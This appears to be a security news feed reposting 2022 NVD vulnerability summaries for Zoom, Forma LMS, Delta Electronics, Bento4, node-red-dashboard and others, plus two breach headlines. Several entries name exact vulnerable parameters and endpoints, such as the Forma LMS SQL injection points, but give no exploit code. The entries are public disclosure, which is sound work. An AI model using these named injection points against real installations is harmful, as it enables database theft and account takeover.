βΌ CVE-2022-28763 βΌ
π Read
via "National Vulnerability Database".
The Zoom Client for Meetings (for Android, iOS, Linux, macOS, and Windows) before version 5.12.2 is susceptible to a URL parsing vulnerability. If a malicious Zoom meeting URL is opened, the malicious link may direct the user to connect to an arbitrary network address, leading to additional attacks including session takeovers.π Read
via "National Vulnerability Database".
βΌ CVE-2022-41772 βΌ
π Read
via "National Vulnerability Database".
Delta Electronics InfraSuite Device Master Versions 00.00.01a and prior mishandle .ZIP archives containing characters used in path traversal. This path traversal could result in remote code execution.π Read
via "National Vulnerability Database".
βΌ CVE-2022-41657 βΌ
π Read
via "National Vulnerability Database".
Delta Electronics InfraSuite Device Master Versions 00.00.01a and prior allow attacker provided data already serialized into memory to be used in file operation application programmable interfaces (APIs). This could create arbitrary files, which could be used in API operations and could ultimately result in remote code execution.π Read
via "National Vulnerability Database".
βΌ CVE-2022-42923 βΌ
π Read
via "National Vulnerability Database".
Forma LMS on its 3.1.0 version and earlier is vulnerable to a SQL injection vulnerability. The exploitation of this vulnerability could allow an authenticated attacker (with the role of student) to perform a SQL injection on the 'id' parameter in the 'appCore/index.php?r=adm/mediagallery/delete' function in order to dump the entire database or delete all contents from the 'core_user_file' table.π Read
via "National Vulnerability Database".
βΌ CVE-2022-40287 βΌ
π Read
via "National Vulnerability Database".
The application was found to be vulnerable to an authenticated Stored Cross-Site Scripting (XSS) vulnerability in messaging functionality, leading to privilege escalation or a compromise of a targeted account.π Read
via "National Vulnerability Database".
βΌ CVE-2022-40294 βΌ
π Read
via "National Vulnerability Database".
The application was identified to have an CSV injection in data export functionality, allowing for malicious code to be embedded within export data and then triggered in exported data viewers.π Read
via "National Vulnerability Database".
βΌ CVE-2022-42924 βΌ
π Read
via "National Vulnerability Database".
Forma LMS on its 3.1.0 version and earlier is vulnerable to a SQL injection vulnerability. The exploitation of this vulnerability could allow an authenticated attacker (with the role of student) to perform a SQL injection on the 'dyn_filter' parameter in the 'appLms/ajax.adm_server.php?r=widget/userselector/getusertabledata' function in order to dump the entire database.π Read
via "National Vulnerability Database".
βΌ CVE-2022-3783 βΌ
π Read
via "National Vulnerability Database".
A vulnerability, which was classified as problematic, has been found in node-red-dashboard. This issue affects some unknown processing of the file components/ui-component/ui-component-ctrl.js of the component ui_text Format Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The name of the patch is 9305d1a82f19b235dfad24a7d1dd4ed244db7743. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-212555.π Read
via "National Vulnerability Database".
βΌ CVE-2022-40290 βΌ
π Read
via "National Vulnerability Database".
The application was vulnerable to an unauthenticated Reflected Cross-Site Scripting (XSS) vulnerability in the barcode generation functionality, allowing attackers to generate an unsafe link that could compromise users.π Read
via "National Vulnerability Database".
βΌ CVE-2022-41681 βΌ
π Read
via "National Vulnerability Database".
There is a vulnerability on Forma LMS version 3.1.0 and earlier that could allow an authenticated attacker (with the role of student) to privilege escalate in order to upload a Zip file through the SCORM importer feature. The exploitation of this vulnerability could lead to a remote code injection.π Read
via "National Vulnerability Database".
βΌ CVE-2022-41679 βΌ
π Read
via "National Vulnerability Database".
Forma LMS version 3.1.0 and earlier are affected by an Cross-Site scripting vulnerability, that could allow a remote attacker to inject javascript code on the Γ’β¬Εback_urlΓ’β¬οΏ½ parameter in appLms/index.php?modname=faq&op=play function. The exploitation of this vulnerability could allow an attacker to steal the userΓΒ΄s cookies in order to log in to the application.π Read
via "National Vulnerability Database".
βΌ CVE-2022-40190 βΌ
π Read
via "National Vulnerability Database".
SAUTER Controls moduWeb firmware version 2.7.1 is vulnerable to reflective cross-site scripting (XSS). The web application does not adequately sanitize request strings of malicious JavaScript. An attacker utilizing XSS could then execute malicious code in usersΓ’β¬β’ browsers and steal sensitive information, including user credentials.π Read
via "National Vulnerability Database".
βΌ CVE-2022-3784 βΌ
π Read
via "National Vulnerability Database".
A vulnerability classified as critical was found in Axiomatic Bento4 5e7bb34. Affected by this vulnerability is the function AP4_Mp4AudioDsiParser::ReadBits of the file Ap4Mp4AudioInfo.cpp of the component mp4hls. The manipulation leads to heap-based buffer overflow. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-212563.π Read
via "National Vulnerability Database".
βΌ CVE-2022-3785 βΌ
π Read
via "National Vulnerability Database".
A vulnerability, which was classified as critical, has been found in Axiomatic Bento4. Affected by this issue is the function AP4_DataBuffer::SetDataSize of the component Avcinfo. The manipulation leads to heap-based buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-212564.π Read
via "National Vulnerability Database".
βΌ CVE-2022-40291 βΌ
π Read
via "National Vulnerability Database".
The application was vulnerable to Cross-Site Request Forgery (CSRF) attacks, allowing an attacker to coerce users into sending malicious requests to the site to delete their account, or in rare circumstances, hijack their account and create other admin accounts.π Read
via "National Vulnerability Database".
βΌ CVE-2022-41680 βΌ
π Read
via "National Vulnerability Database".
Forma LMS on its 3.1.0 version and earlier is vulnerable to a SQL injection vulnerability. The exploitation of this vulnerability could allow an authenticated attacker (with the role of student) to perform a SQL injection on the 'search[value] parameter in the appLms/ajax.server.php?r=mycertificate/getMyCertificates' function in order to dump the entire database.π Read
via "National Vulnerability Database".
βΌ CVE-2022-43752 βΌ
π Read
via "National Vulnerability Database".
** UNSUPPORTED WHEN ASSIGNED ** Oracle Solaris version 10 1/13, when using the Common Desktop Environment (CDE), is vulnerable to a privilege escalation vulnerability. A low privileged user can escalate to root by crafting a malicious printer and double clicking on the the crafted printer's icon.π Read
via "National Vulnerability Database".
βΌ CVE-2022-42925 βΌ
π Read
via "National Vulnerability Database".
There is a vulnerability on Forma LMS version 3.1.0 and earlier that could allow an authenticated attacker (with the role of student) to privilege escalate in order to upload a Zip file through the plugin upload component. The exploitation of this vulnerability could lead to a remote code injection.π Read
via "National Vulnerability Database".
β Psychotherapy extortion suspect: arrest warrant issued β
π Read
via "Naked Security".
Wanted! Not only the extortionist who abused the data, but also the CEO who let it happen.π Read
via "Naked Security".
Naked Security
Psychotherapy extortion suspect: arrest warrant issued
Wanted! Not only the extortionist who abused the data, but also the CEO who let it happen.
π1
βΌ CVE-2021-27784 βΌ
π Read
via "National Vulnerability Database".
The provided HCL Launch Container images contain non-unique HTTPS certificates and a database encryption key. The fix provides directions and tools to replace the non-unique keys and certificates. This does not affect the standard installer packages.π Read
via "National Vulnerability Database".
π’ Australia's Department of Defence becomes latest victim of regional ransomware attacks π’
π Read
via "ITPro".
Military information was not stolen in the breach, which may affect the records of 40,000 defence personnelπ Read
via "ITPro".
ITPro
Australia's Department of Defence becomes latest victim of regional ransomware attacks
Military information was not stolen in the breach, which may affect the records of 40,000 defence personnel
π1